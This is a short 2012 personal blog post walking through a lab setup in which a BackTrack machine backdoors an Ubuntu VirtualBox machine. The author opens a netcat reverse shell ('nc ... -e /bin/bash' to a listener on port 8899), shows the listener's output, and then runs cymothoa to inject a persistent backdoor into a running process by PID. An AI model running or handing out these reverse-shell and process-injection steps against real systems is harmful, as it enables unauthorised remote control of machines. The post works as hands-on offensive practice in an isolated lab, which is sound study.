About Me

Wednesday, February 1, 2012

Put Cymothoa to Ubuntu Part 2 by Using NC

Ok, this article was a continue of a previous article about backdooring with NC to ubuntu.
Because the version of NC in my Ubuntu VBox is different than  NC in my Backtrack, so for the first step, I copy files nc.traditional, nc, and netcat in directory  /root/bin from my Backtrack to Ubuntu by using a SSH.
After that, put that file into directory /bin.
Ok, next step open the NC in backtrack then i typed command nc -l -v -p 8899 
Then in ubuntu typed a command nc 192.168.56.1 8899 -e /bin/bash in terminal.
Ok then will appear a notice if NC server has been connected to NC client.


root@bt:~# nc -l -v -p 8899
listening on [any] 8899 ...
192.168.56.101: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.101] 44565
Then i typed ls from my Backtrack and then will appear content in the directory ubuntu like this
Ok, next i copy directory folder cymothoa from my Backtrack to my Ubuntu by using ssh too and then from my Backtrack that have been connected to Ubuntu i try to start cymothoa.

Then i typed ps -ax to see the proccess in Ubuntu.
Last i typed a command ./cymothoa -p 1409 -s 0 -y 8899 to infect the ubuntu. And the result is like this.

No comments:

Post a Comment